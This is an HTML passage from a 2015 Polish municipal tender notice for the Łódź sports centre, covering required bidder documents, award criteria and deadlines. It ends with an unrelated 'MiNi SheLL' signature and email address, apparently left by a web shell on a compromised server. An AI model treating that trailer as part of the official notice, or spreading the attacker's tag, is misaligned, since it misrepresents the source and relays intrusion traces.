<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Podstawa zatrudnienia - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://mosirl.bip.eur.pl/public/?id=100855<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Sportu i Rekreacji w Łodzi
90-532 Łódź, ul. ks. Skorupki 21
Dział Techniczno-Inwestycyjny, pokój 020.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.11.2015 godzina 09:55, miejsce: Miejski Ośrodek Sportu i Rekreacji w Łodzi
90-532 Łódź, ul. ks. Skorupki 21
sekretariat, pokój 203.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com